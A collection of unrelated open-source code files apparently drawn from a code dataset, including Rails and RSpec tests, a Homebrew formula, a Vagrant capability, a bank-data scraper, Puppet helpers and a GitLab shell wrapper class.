@home_index = @contact_info_card.phone_type_index 'Home/Permanent'
@local_index = @contact_info_card.phone_type_index 'Local'
end
it 'allows a user to change the phone number and extension' do
@contact_info_card.edit_phone(@mobile_index, @mobile_phone)
@contact_info_card.verify_phone @mobile_phone
end
it 'allows a user to choose a different preferred phone' do
@contact_info_card.edit_phone(@mobile_index, @mobile_phone, true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) { @contact_info_card.phone_primary? @mobile_index }
expect(@contact_info_card.phone_primary? @home_index).to be false
end
it 'prevents a user de-preferring a phone if more than two phones exist' do
@contact_info_card.edit_phone(@mobile_index, @mobile_phone)
@contact_info_card.phone_validation_error_element.when_visible(WebDriverUtils.page_load_timeout)
expect(@contact_info_card.phone_validation_error).to eql('One phone number must be checked as preferred')
end
it 'does not allow a user to change the phone type' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.add_phone_form_element.when_visible(WebDriverUtils.page_event_timeout)
expect(@contact_info_card.phone_type?).to be false
end
it 'requires that a phone number be entered' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.enter_phone(nil, '', nil, nil)
expect(@contact_info_card.save_phone_button_element.attribute('disabled')).to eql('true')
end
it 'does not require that a phone extension be entered' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.enter_phone(nil, '1234567890', nil, nil)
expect(@contact_info_card.save_phone_button_element.attribute('disabled')).to be_nil
end
it 'requires that a valid phone extension be entered' do
@contact_info_card.edit_phone(@home_index, @home_phone)
@contact_info_card.phone_validation_error_element.when_visible(WebDriverUtils.page_load_timeout)
expect(@contact_info_card.phone_validation_error).to eql('Invalid Phone Extension number: ?')
end
it 'allows a maximum number of characters to be entered in each field' do
@contact_info_card.edit_phone(@local_index, @local_phone)
@contact_info_card.verify_phone @local_phone
end
end
describe 'deleting' do
before(:all) do
@mobile_index = @contact_info_card.phone_type_index 'Mobile'
@local_index = @contact_info_card.phone_type_index 'Local'
end
it 'prevents a user deleting a preferred phone if there are more than two phones' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.click_delete_phone
@contact_info_card.phone_validation_error_element.when_visible WebDriverUtils.page_load_timeout
expect(@contact_info_card.phone_validation_error).to eql('One Phone number must be checked as Preferred')
end
it 'allows a user to delete any un-preferred phone' do
@contact_info_card.delete_phone @local_index
end
end
end
describe 'email address' do
before(:all) do
# Get rid of existing email if present
@contact_info_card.delete_email
end
describe 'adding' do
it 'allows a user to add an email of type "Other" only' do
@contact_info_card.click_add_email
expect(@contact_info_card.email_type_options).to eql(['Other'])
end
it 'requires that an email address be entered' do
@contact_info_card.click_add_email
expect(@contact_info_card.save_email_button_element.attribute('disabled')).to eql('true')
end
it 'allows a user to cancel the new email' do
@contact_info_card.click_add_email
@contact_info_card.click_cancel_email
@contact_info_card.email_form_element.when_not_visible(WebDriverUtils.page_event_timeout)
end
it 'requires that the email address include the @ and . characters' do
@contact_info_card.add_email('foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the . character' do
@contact_info_card.add_email('foo@bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the @ character' do
@contact_info_card.add_email('foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address contain at least one . following the @' do
@contact_info_card.add_email('foo.bar@foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain @ as the first character' do
@contact_info_card.add_email('@foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain . as the last character' do
@contact_info_card.add_email('foo@bar.', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'allows a maximum of 70 email address characters to be entered' do
@contact_info_card.add_email('foobar@foobar.foobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoo', true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, "Visible email types are '#{@contact_info_card.email_types}'") do
@contact_info_card.email_types.include? 'Other'
end
end
it 'prevents a user adding an email of the same type as an existing one' do
expect(@contact_info_card.add_email_button?).to be false
end
end
describe 'editing' do
before(:all) do
@index = @contact_info_card.email_type_index 'Other'
end
it 'allows a user to choose a different preferred email' do
# This example requires that a campus email be present, which might not be true
if @contact_info_card.email_types.include? 'Campus'
@contact_info_card.edit_email nil
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) { !@contact_info_card.email_primary?(@index) }
else
logger.warn 'Only one email exists, so skipping test for switching preferred emails'
end
end
it 'allows a user to change the email address' do
new_address = '[email protected]'
@contact_info_card.edit_email(new_address, true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, 'New email was not saved') do
@contact_info_card.email_addresses.include? new_address
end
end
it 'requires that an email address be entered' do
@contact_info_card.click_edit_email
@contact_info_card.email_form_element.when_visible(WebDriverUtils.page_event_timeout)
expect(@contact_info_card.save_email_button_element.attribute('disabled')).to be_nil
end
it 'prevents a user changing an email type to the same type as an existing one' do
@contact_info_card.click_edit_email
@contact_info_card.email_form_element.when_visible(WebDriverUtils.page_event_timeout)
expect(@contact_info_card.email_type?).to be false
end
it 'requires that the email address include the @ and . characters' do
@contact_info_card.edit_email('foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the . character' do
@contact_info_card.edit_email('foo@bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the @ character' do
@contact_info_card.edit_email('foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address contain at least one . following the @' do
@contact_info_card.edit_email('foo.bar@foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain @ as the first character' do
@contact_info_card.edit_email('@foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain . as the last character' do
@contact_info_card.edit_email('foo@bar.', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'allows a maximum of 70 email address characters to be entered' do
@contact_info_card.edit_email('foobar@foobar.foobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoo', true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) { @contact_info_card.email_types.include? 'Other' }
end
end
describe 'deleting' do
it 'allows a user to delete an email of type Other' do
@contact_info_card.delete_email
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { !@contact_info_card.email_types.include? 'Other' }
end
end
end
describe 'address' do
# Make sure the user has both Local and Home addresses before proceeding
before(:all) do
@contact_info_card.load_page
@contact_info_card.address_label_element.when_visible WebDriverUtils.page_load_timeout
unless @contact_info_card.address_types.include? 'Local'
logger.warn 'Cannot find Local address, adding it'
@contact_info_card.add_address(addresses[0], addresses[0]['inputs'], addresses[0]['selects'])
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, 'Local address was not added') do
@contact_info_card.address_types.include? 'Local'
end
end
@local_index = @contact_info_card.address_type_index 'Local'
unless @contact_info_card.address_types.include? 'Home'
logger.warn 'Cannot find Home address, adding it'
@contact_info_card.add_address(addresses[0], addresses[0]['inputs'], addresses[0]['selects'])
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, 'Home address was not added') do
@contact_info_card.address_types.include? 'Home'
end
end
@home_index = @contact_info_card.address_type_index 'Home'
@addresses = @contact_info_card.address_formatted_elements.length
end
describe 'editing' do
# Iterate through each address in the test data file to exercise the internationalized address forms
addresses.each do |address|
it "allows a user to enter an address for #{address['country']} with max character restrictions" do
address_inputs = address['inputs']
address_selects = address['selects']
@contact_info_card.load_page
@contact_info_card.edit_address(@local_index, address, address_inputs, address_selects)
@contact_info_card.verify_address(@local_index, address_inputs, address_selects)
sleep 30
end
it "requires a user to complete certain fields for an address in #{address['country']}" do
@contact_info_card.load_page
@contact_info_card.click_edit_address @local_index
@contact_info_card.clear_address_fields(address, address['inputs'], address['selects'])
@contact_info_card.click_save_address
@contact_info_card.verify_req_field_error address
end
it "allows a user to cancel the new address in #{address['country']}" do
@contact_info_card.click_cancel_address if @contact_info_card.cancel_address_button_element.visible?
current_address = @contact_info_card.formatted_address @local_index
@contact_info_card.click_edit_address @local_index
@contact_info_card.click_cancel_address
expect(@contact_info_card.formatted_address @local_index).to eql(current_address)
end
it "allows a user to delete individual address fields from an address in #{address['country']}" do
nonreq_address_inputs = address['inputs'].reject { |input| input['req'] }
req_address_inputs = address['inputs'] - nonreq_address_inputs
@contact_info_card.click_edit_address @local_index
@contact_info_card.clear_address_fields(address, nonreq_address_inputs, address['selects'])
@contact_info_card.click_save_address
@contact_info_card.verify_address(@local_index, req_address_inputs, [])
end
it 'prevents a user adding an address of the same type as an existing one' do
expect(@contact_info_card.add_address_button?).to be false
end
end
end
describe 'deleting' do
it 'prevents a user deleting an address of type Home/Permanent' do
@contact_info_card.click_edit_address @home_index
expect(@contact_info_card.delete_address_button?).to be false
end
it 'prevents a user deleting an address of type Local' do
@contact_info_card.click_edit_address @local_index
expect(@contact_info_card.delete_address_button?).to be false
end
end
end
end
end
| 51.144847 | 147 | 0.693535 |
33f50ca4f520d73183cc095bbf5ff06e10837f9d
| 603 |
require_relative '../../linux/cap/change_host_name'
module VagrantPlugins
module GuestPld
module Cap
class ChangeHostName
extend VagrantPlugins::GuestLinux::Cap::ChangeHostName
def self.change_name_command(name)
return <<-EOH.gsub(/^ {14}/, "")
hostname '#{name}'
sed -i 's/\\(HOSTNAME=\\).*/\\1#{name}/' /etc/sysconfig/network
sed -i 's/\\(DHCP_HOSTNAME=\\).*/\\1\"#{name}\"/' /etc/sysconfig/interfaces/ifcfg-*
# Restart networking
service network restart
EOH
end
end
end
end
end
| 25.125 | 93 | 0.578773 |
d5be74a651e282c677392a389d9a21926bf7c34b
| 889 |
class SwiftFormat < Formula
desc "Formatting technology for Swift source code"
homepage "https://github.com/apple/swift-format"
url "https://github.com/apple/swift-format.git",
:tag => "0.50200.1",
:revision => "f22aade8a6ee061b4a7041601ededd8ad7bc2122"
version_scheme 1
head "https://github.com/apple/swift-format.git"
bottle do
cellar :any_skip_relocation
sha256 "d8f72c33efc125e2904e1bec2c8942cca75d75cf81dcab7fcf08ba124af16170" => :catalina
end
depends_on :xcode => ["11.4", :build]
def install
system "swift", "build", "--disable-sandbox", "-c", "release"
bin.install ".build/release/swift-format"
doc.install "Documentation/Configuration.md"
end
test do
(testpath/"test.swift").write " print( \"Hello, World\" ) ;"
assert_equal "print(\"Hello, World\")\n", shell_output("#{bin}/swift-format test.swift")
end
end
| 31.75 | 92 | 0.697413 |
625c4130be50646db3c374da87aafef3312e8180
| 763 |
require "rails_helper"
require_relative "form/helpers"
RSpec.describe "Start Page Features" do
include Helpers
let(:user) { FactoryBot.create(:user) }
context "when the user is signed in" do
before do
sign_in user
end
it "takes you to logs" do
visit("/")
expect(page).to have_current_path("/logs")
end
end
context "when the user is not signed in" do
it "takes you to sign in and then to logs" do
visit("/")
click_link("Start now")
expect(page).to have_current_path("/account/sign-in?start=true")
fill_in("user[email]", with: user.email)
fill_in("user[password]", with: user.password)
click_button("Sign in")
expect(page).to have_current_path("/logs")
end
end
end
| 24.612903 | 70 | 0.651376 |
1c4a42dcd4b01fd44d3390d9f99c6fc1ec2dd89c
| 142 |
class Bike
def initialize
@broken = false
end
def working?
!@broken
end
def report_broken
@broken = true
end
end
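# Minimal usage sketch (illustrative), exercising the state transitions above:
if $PROGRAM_NAME == __FILE__
  bike = Bike.new
  puts bike.working?   # => true
  bike.report_broken
  puts bike.working?   # => false
end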
| 8.352941 | 19 | 0.612676 |
380514eb6af1384a2486dbbee3c22bc0917791b7
| 1,755 |
# -*- encoding: utf-8 -*-
# stub: rails-html-sanitizer 1.0.2 ruby lib
Gem::Specification.new do |s|
s.name = "rails-html-sanitizer"
s.version = "1.0.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Rafael Mendon\u{e7}a Fran\u{e7}a", "Kasper Timm Hansen"]
s.date = "2015-03-10"
s.description = "HTML sanitization for Rails applications"
s.email = ["[email protected]", "[email protected]"]
s.homepage = "https://github.com/rafaelfranca/rails-html-sanitizer"
s.licenses = ["MIT"]
s.rubygems_version = "2.4.8"
s.summary = "This gem is responsible to sanitize HTML fragments in Rails applications."
s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<loofah>, ["~> 2.0"])
s.add_development_dependency(%q<bundler>, ["~> 1.3"])
s.add_development_dependency(%q<rake>, [">= 0"])
s.add_development_dependency(%q<minitest>, [">= 0"])
s.add_development_dependency(%q<rails-dom-testing>, [">= 0"])
else
s.add_dependency(%q<loofah>, ["~> 2.0"])
s.add_dependency(%q<bundler>, ["~> 1.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<minitest>, [">= 0"])
s.add_dependency(%q<rails-dom-testing>, [">= 0"])
end
else
s.add_dependency(%q<loofah>, ["~> 2.0"])
s.add_dependency(%q<bundler>, ["~> 1.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<minitest>, [">= 0"])
s.add_dependency(%q<rails-dom-testing>, [">= 0"])
end
end
| 39 | 105 | 0.638746 |
91ff48d5d3a1901d410160679dbb6fa72319f578
| 2,364 |
require 'nokogiri'
require 'json'
require 'uri'
require 'yaml'
def write_sublet_json(sublets)
File.open('data/sublet.json', 'w') do |f|
f.write JSON.pretty_generate(Hash[sublets.sort])
log 'Saved data/sublet.json'
end
end
def write_banks_json(banks)
File.open('data/banks.json', 'w') do |f|
f.write JSON.pretty_generate(Hash[banks.sort])
log 'Saved data/banks.json'
end
end
def match_length_or_nil(data, expected_length)
data = data.text.strip
data.length == expected_length ? data : nil
end
def get_value(data)
!data.nil? && data.text.strip == 'Yes'
end
def bank_data(bank_code, data, _ifsc)
{
code: bank_code,
type: data[3].text.strip,
# IFSC codes are 11 characters long
ifsc: match_length_or_nil(data[4], 11),
# MICR codes are 9 digits long
micr: match_length_or_nil(data[5], 9),
# IINs are 6 digits long
iin: match_length_or_nil(data[6], 6),
apbs: data[7].text.strip == 'Yes',
ach_credit: data[8].text.strip == 'Yes',
ach_debit: data[9].text.strip == 'Yes',
nach_debit: get_value(data[10])
}
end
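# For a typical row, the hash built above looks roughly like this (values are
# illustrative, not taken from real NPCI data):
# {
#   code: "HDFC", type: "Direct Member",
#   ifsc: "HDFC0000001", micr: "400240001", iin: "607152",
#   apbs: true, ach_credit: true, ach_debit: true, nach_debit: true
# }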
def parse_upi
doc = Nokogiri::HTML(open('upi.html'))
header_cleared = false
count = doc.css('table>tbody')[0].css('tr').size
upi_patch_filename = '../../src/patches/banks/upi-enabled-banks.yml'
# Count the number of banks we have in our UPI patch file:
data = YAML.safe_load(File.read(upi_patch_filename), [Symbol])
if data['banks'].size != count
log "Number of UPI-enabled banks (#{data['banks'].size}) does not match the count on the NPCI website (#{count})}", :critical
log "Please check https://www.npci.org.in/what-we-do/upi/live-members and update src/patches/banks/upi-enabled-banks.yml", :debug
exit 1
end
end
def parse_nach
doc = Nokogiri::HTML(open('nach.html'))
header_cleared = false
sublets = {}
banks = {}
doc.css('table')[0].css('tr').each do |row|
if header_cleared
data = row.css('td')
ifsc = data[4].text.strip
bank_code = data[1].text.strip
sublets[ifsc] = bank_code if ifsc.size == 11 && ifsc[0..3] != bank_code
banks[bank_code] = bank_data(bank_code, data, ifsc)
end
header_cleared = true
end
write_sublet_json(sublets)
# This is where the upi:true parameter to banks.json gets added
banks = apply_bank_patches(banks)
write_banks_json(banks)
banks
end
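# Illustrative entry point (assumed: `log` and `apply_bank_patches` are defined
# elsewhere in this scraper's toolchain, and nach.html/upi.html have already been
# downloaded):
# parse_upi
# parse_nach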
| 27.811765 | 133 | 0.673858 |
62386943f92a0d68a6b6c305415f4502cea6d575
| 2,484 |
require_relative "base"
require "app/commands/create_customer"
require "app/commands/create_appointment"
require "app/queries/show_customers"
require "app/queries/offers_lookup"
require "app/queries/show_customer"
require "app/helpers/form_errors"
module Carpanta
module Controllers
class Customers < Base
get "/customers" do
result = Queries::ShowCustomers.call
haml :'customers/index', locals: {customers: result.value!}
end
get "/customers/new" do
form_errors = Helpers::FormErrors.new
haml :'customers/new', {}, {values: {}, form_errors: form_errors}
end
post "/customers" do
result = Commands::CreateCustomer.call(customer_attributes)
redirect("/customers") if result.success?
form_errors = Helpers::FormErrors.new(result.failure)
status 422
haml :'customers/new', {}, {values: customer_attributes, form_errors: form_errors}
end
get "/customers/:customer_id" do
result = Queries::ShowCustomer.call(params[:customer_id])
if result.success?
haml :'customers/show', locals: {customer: result.value!}
else
status 404
end
end
post "/customers/:customer_id/appointments" do
result = Commands::CreateAppointment.call(appointment_params)
redirect("/customers/#{appointment_params[:customer_id]}") if result.success?
form_errors = Helpers::FormErrors.new(result.failure)
offers_result = Queries::OffersLookup.call
status 422
haml :'customers/appointments/new', locals: {customer_id: params[:customer_id], offers: offers_result.value!, values: appointment_params, form_errors: form_errors}
end
get "/customers/:customer_id/appointments/new" do
offers_result = Queries::OffersLookup.call
form_errors = Helpers::FormErrors.new
haml :'customers/appointments/new', locals: {customer_id: params[:customer_id], offers: offers_result.value!, values: {}, form_errors: form_errors}
end
private
def customer_attributes
attributes = params.fetch(:customer, {}).deep_symbolize_keys
attributes.filter { |_, v| v.present? }
end
def appointment_params
attributes = params.fetch(:appointment, {}).deep_symbolize_keys
attributes = attributes.filter { |_, v| v.present? }
attributes.merge(customer_id: params["customer_id"])
end
end
end
end
| 32.684211 | 171 | 0.674718 |
91d1a2d081ff0ecd986e6084d1cc3e62ae105798
| 149 |
class AddEmergencyContactToRenewal < ActiveRecord::Migration[5.2]
def change
add_column :renewals, :emergency_contact_details, :text
end
end
| 24.833333 | 65 | 0.791946 |
ac122ddee541b762d3877de6974dd515174c2e23
| 783 |
class CreateClinicalAllergies < ActiveRecord::Migration[4.2]
def change
create_table :clinical_allergies do |t|
t.references :patient, index: true, null: false
t.text :description, null: false
t.datetime :recorded_at, null: false
t.datetime :deleted_at
t.references :created_by, index: true, null: false
t.references :updated_by, index: true, null: false
end
add_foreign_key :clinical_allergies, :patients, column: :patient_id
add_foreign_key :clinical_allergies, :users, column: :created_by_id
add_foreign_key :clinical_allergies, :users, column: :updated_by_id
# See Clinical::Patient#allergy_status for possible values
add_column :patients, :allergy_status, :string, null: false, default: "unrecorded"
end
end
| 39.15 | 86 | 0.731801 |
269dc873476dd79ad58e5c3739a47490f42d6b26
| 1,571 |
#
# Be sure to run `pod lib lint curl.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'curl'
s.version = '0.1.0'
s.summary = 'A short description of curl.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/billnie/ios_curl'
s.license = { :type => "MIT", }
s.authors = { "billnie" => "[email protected]" }
s.source = { :git => 'https://github.com/billnie/ios_curl.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.source_files = 'libcurl/**/*'
s.public_header_files = 'libcurl/*.{h,hpp}'
s.ios.vendored_library = 'lib/ios/*.a'
# s.ios.library = 'lib/ios/*.a'
s.libraries = 'ssl','crypto','curl','z'
# s.vendored_libraries = 'lib/ios/*.a'
s.subspec 'lib' do |ss|
ss.source_files = 'lib/ios/**/*.{a}'
end
#s.xcconfig = { "HEADER_SEARCH_PATHS" => "${PROJECT_DIR}/libcurl/",
#"LIBRARY_SEARCH_PATHS" => "$(PODS_ROOT)/lib/ios"
#}
end
| 33.425532 | 100 | 0.630808 |
1c61bf1f6b513719e0c0e4dd58a23941d7357c70
| 685 |
class AccessTokensController < ApplicationController
before_action :authenticate_user, only: :destroy
def create
user = User.find_by(email: login_params[:email])
if user && user.authenticate(login_params[:password])
login = Login.new(user, api_key)
if (token = login.call)
data = AccessTokenSerializer.new(login.access_token, token)
serialize(data)
else
handle_error(:invalid_parameter)
end
else
handle_error(:invalid_credentials)
end
end
def destroy
access_token.destroy
serialize({})
end
private
def login_params
params.permit(:email, :password, :first_name, :last_name)
end
end
| 21.40625 | 67 | 0.686131 |
1d5a71068c146abbb3b028b751863c8be530ba51
| 494 |
# Method Value Helper Module
module Puppet::Util::NetworkDevice::ValueHelper
def define_value_method(methods)
methods.each do |meth|
define_method(meth) do |*args, &block|
# return the current value if we are called like an accessor
return instance_variable_get("@#{meth}".to_sym) if args.empty? && block.nil?
# set the new value if there is any
instance_variable_set("@#{meth}".to_sym, (block.nil? ? args.first : block))
end
end
end
end
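# Illustrative sketch (the device class below is hypothetical): extending a class
# with this helper defines combined getter/setter methods backed by instance
# variables.
if $PROGRAM_NAME == __FILE__
  class ExampleDevice
    extend Puppet::Util::NetworkDevice::ValueHelper
    define_value_method [:mtu]
  end

  dev = ExampleDevice.new
  dev.mtu 1500   # with an argument, stores the value in @mtu and returns it
  puts dev.mtu   # without arguments, reads @mtu back => 1500
end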
| 35.285714 | 84 | 0.672065 |
62c5391681a110be44da021a0cd6c0e77e78c1c8
| 1,913 |
# Copyright 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
module Puppet::Parser::Functions
newfunction(:get_vmware_devices, :type => :rvalue, :doc => <<-EOS
Returns device name for internal vmware traffic
example:
get_vmware_devices()
EOS
) do |args|
bridge_interfaces = Array.new()
bond_interfaces = Array.new()
network_scheme = function_hiera_hash(['network_scheme', {}])
network_scheme['transformations'].each do |entry|
if entry.has_key?('bridge') and entry['action'] == "add-port"
bridge_interfaces.push(entry['name'])
end
if entry.has_key?('bond_properties') and entry['action'] == "add-bond"
bond_interfaces.push(*entry['interfaces'])
end
end
Dir.foreach('/sys/class/net') do |network_interface|
next if network_interface == '.' or network_interface == '..'
network_interface_path = "/sys/class/net/" + network_interface
if (not bridge_interfaces.include?(network_interface) and
not bond_interfaces.include?(network_interface))
int_driver = network_interface_path + '/device/driver/module'
if File.exist?(int_driver)
path = File.readlink(network_interface_path + '/device/driver/module')
driver_name = path.split('/')[-1]
return network_interface
end
end
end
end
end
| 37.509804 | 80 | 0.676947 |
01b8bda05c6741cf7b914735722447388cec42f7
| 7,427 |
module Gitlab
class Shell
class AccessDenied < StandardError; end
class KeyAdder < Struct.new(:io)
def add_key(id, key)
key.gsub!(/[[:space:]]+/, ' ').strip!
io.puts("#{id}\t#{key}")
end
end
class << self
def version_required
@version_required ||= File.read(Rails.root.
join('GITLAB_SHELL_VERSION')).strip
end
end
# Init new repository
#
# name - project path with namespace
#
# Ex.
# add_repository("gitlab/gitlab-ci")
#
def add_repository(name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path,
'add-project', "#{name}.git"])
end
# Import repository
#
# name - project path with namespace
#
# Ex.
# import_repository("gitlab/gitlab-ci", "https://github.com/randx/six.git")
#
def import_repository(name, url)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'import-project',
"#{name}.git", url, '240'])
end
# Move repository
#
# path - project path with namespace
# new_path - new project path with namespace
#
# Ex.
# mv_repository("gitlab/gitlab-ci", "randx/gitlab-ci-new.git")
#
def mv_repository(path, new_path)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'mv-project',
"#{path}.git", "#{new_path}.git"])
end
# Update HEAD for repository
#
# path - project path with namespace
# branch - repository branch name
#
# Ex.
# update_repository_head("gitlab/gitlab-ci", "3-1-stable")
#
def update_repository_head(path, branch)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'update-head',
"#{path}.git", branch])
end
# Fork repository to new namespace
#
# path - project path with namespace
# fork_namespace - namespace for forked project
#
# Ex.
# fork_repository("gitlab/gitlab-ci", "randx")
#
def fork_repository(path, fork_namespace)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'fork-project',
"#{path}.git", fork_namespace])
end
# Remove repository from file system
#
# name - project path with namespace
#
# Ex.
# remove_repository("gitlab/gitlab-ci")
#
def remove_repository(name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path,
'rm-project', "#{name}.git"])
end
# Add repository branch from passed ref
#
# path - project path with namespace
# branch_name - new branch name
# ref - HEAD for new branch
#
# Ex.
# add_branch("gitlab/gitlab-ci", "4-0-stable", "master")
#
def add_branch(path, branch_name, ref)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'create-branch',
"#{path}.git", branch_name, ref])
end
# Remove repository branch
#
# path - project path with namespace
# branch_name - branch name to remove
#
# Ex.
# rm_branch("gitlab/gitlab-ci", "4-0-stable")
#
def rm_branch(path, branch_name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'rm-branch',
"#{path}.git", branch_name])
end
# Add repository tag from passed ref
#
# path - project path with namespace
# tag_name - new tag name
# ref - HEAD for new tag
# message - optional message for tag (annotated tag)
#
# Ex.
# add_tag("gitlab/gitlab-ci", "v4.0", "master")
# add_tag("gitlab/gitlab-ci", "v4.0", "master", "message")
#
def add_tag(path, tag_name, ref, message = nil)
cmd = %W(#{gitlab_shell_path}/bin/gitlab-projects create-tag #{path}.git
#{tag_name} #{ref})
cmd << message unless message.nil? || message.empty?
Gitlab::Utils.system_silent(cmd)
end
# Remove repository tag
#
# path - project path with namespace
# tag_name - tag name to remove
#
# Ex.
# rm_tag("gitlab/gitlab-ci", "v4.0")
#
def rm_tag(path, tag_name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'rm-tag',
"#{path}.git", tag_name])
end
# Add new key to gitlab-shell
#
# Ex.
# add_key("key-42", "ssh-rsa ...")
#
def add_key(key_id, key_content)
Gitlab::Utils.system_silent([gitlab_shell_keys_path,
'add-key', key_id, key_content])
end
# Batch-add keys to authorized_keys
#
# Ex.
# batch_add_keys { |adder| adder.add_key("key-42", "ssh-rsa ...") }
def batch_add_keys(&block)
IO.popen(%W(#{gitlab_shell_path}/bin/gitlab-keys batch-add-keys), 'w') do |io|
block.call(KeyAdder.new(io))
end
end
# Remove ssh key from gitlab shell
#
# Ex.
# remove_key("key-342", "ssh-rsa ...")
#
def remove_key(key_id, key_content)
Gitlab::Utils.system_silent([gitlab_shell_keys_path,
'rm-key', key_id, key_content])
end
# Remove all ssh keys from gitlab shell
#
# Ex.
# remove_all_keys
#
def remove_all_keys
Gitlab::Utils.system_silent([gitlab_shell_keys_path, 'clear'])
end
# Add empty directory for storing repositories
#
# Ex.
# add_namespace("gitlab")
#
def add_namespace(name)
FileUtils.mkdir(full_path(name), mode: 0770) unless exists?(name)
end
# Remove directory from repositories storage
# Every repository inside this directory will be removed too
#
# Ex.
# rm_namespace("gitlab")
#
def rm_namespace(name)
FileUtils.rm_r(full_path(name), force: true)
end
# Move namespace directory inside repositories storage
#
# Ex.
# mv_namespace("gitlab", "gitlabhq")
#
def mv_namespace(old_name, new_name)
return false if exists?(new_name) || !exists?(old_name)
FileUtils.mv(full_path(old_name), full_path(new_name))
end
def url_to_repo(path)
Gitlab.config.gitlab_shell.ssh_path_prefix + "#{path}.git"
end
# Return GitLab shell version
def version
gitlab_shell_version_file = "#{gitlab_shell_path}/VERSION"
if File.readable?(gitlab_shell_version_file)
File.read(gitlab_shell_version_file).chomp
end
end
# Check if such directory exists in repositories.
#
# Usage:
# exists?('gitlab')
# exists?('gitlab/cookies.git')
#
def exists?(dir_name)
File.exist?(full_path(dir_name))
end
protected
def gitlab_shell_path
Gitlab.config.gitlab_shell.path
end
def gitlab_shell_user_home
File.expand_path("~#{Gitlab.config.gitlab_shell.ssh_user}")
end
def repos_path
Gitlab.config.gitlab_shell.repos_path
end
def full_path(dir_name)
raise ArgumentError.new("Directory name can't be blank") if dir_name.blank?
File.join(repos_path, dir_name)
end
def gitlab_shell_projects_path
File.join(gitlab_shell_path, 'bin', 'gitlab-projects')
end
def gitlab_shell_keys_path
File.join(gitlab_shell_path, 'bin', 'gitlab-keys')
end
end
end
| 27.205128 | 84 | 0.595261 |
1115e33e4d8085b8b508eb7419b9d0f25b6a1e2c
| 1,236 |
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
require 'kaitai/struct/struct'
unless Gem::Version.new(Kaitai::Struct::VERSION) >= Gem::Version.new('0.9')
raise "Incompatible Kaitai Struct Ruby API: 0.9 or later is required, but you have #{Kaitai::Struct::VERSION}"
end
class ParamsPassArrayStr < Kaitai::Struct::Struct
